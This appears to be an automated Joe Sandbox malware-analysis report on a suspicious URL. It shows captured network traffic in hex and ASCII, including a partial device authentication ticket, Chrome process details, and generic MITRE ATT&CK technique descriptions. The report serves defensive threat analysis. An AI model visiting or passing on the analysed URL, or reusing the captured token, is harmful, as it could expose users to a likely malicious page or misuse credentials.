2025-01-13 00:50:14 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 33 6c 58 64 76 6c 77 63 45 57 48 6d 31 67 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 38 66 31 66 30 33 38 36 66 64 64 39 33 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 45 2b 7a 48 4d 6e 30 63 46 79 47 75 30 6f 35 62 69 7a 4b 42 31 78 37 65 49 50 45 79 49 55 72 4f 48 6a 2f 53 53 7a 71 78 30 4d 77 34 2b 7a 57 77 46 57 55 43 41 50 32 55 76 67 4d 31 55 4d 51 35 2f 4d 67 67 52 6f 78 77 72 74 57 4b 45 55 79 79 4e 6c 6a 6b 62 4f 4e 37 4f 4f 5a 47 4f 2b 4b 2f 58 2b 6a 34 39 4e 39 74 58 39 78 55 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 73lXdvlwcEWHm1gx.2Context: c98f1f0386fdd934<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARE+zHMn0cFyGu0o5bizKB1x7eIPEyIUrOHj/SSzqx0Mw4+zWwFWUCAP2UvgM1UMQ5/MggRoxwrtWKEUyyNljkbON7OOZGO+K/X+j49N9tX9xU
2025-01-13 00:50:14 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 33 6c 58 64 76 6c 77 63 45 57 48 6d 31 67 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 38 66 31 66 30 33 38 36 66 64 64 39 33 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 73lXdvlwcEWHm1gx.3Context: c98f1f0386fdd934<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-13 00:50:14 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-13 00:50:14 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 36 5a 4b 6f 39 63 62 79 4c 6b 79 59 66 4d 6d 75 56 54 2f 45 32 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 6ZKo9cbyLkyYfMmuVT/E2w.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 1020, Parent PID: 5844

General

Target ID:	1
Start time:	19:49:03
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6332, Parent PID: 1020

General

Target ID:	3
Start time:	19:49:07
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2216,i,5822492874613631544,16240484877137270197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 796, Parent PID: 5844

General

Target ID:	4
Start time:	19:49:14
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.flndmy.er-xu.com/aU3V88/c1.php"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://www.flndmy.er-xu.com/aU3V88/c1.php

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
https://www.flndmy.er-xu.com/aU3V88/c1.php